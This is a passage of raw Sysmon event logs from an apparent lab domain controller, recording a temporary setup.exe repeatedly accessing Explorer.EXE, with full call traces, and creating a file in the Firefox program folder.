mp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\plugin-hang-ui.exe2021-01-18 13:59:52.521 10341000x800000000000000015327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
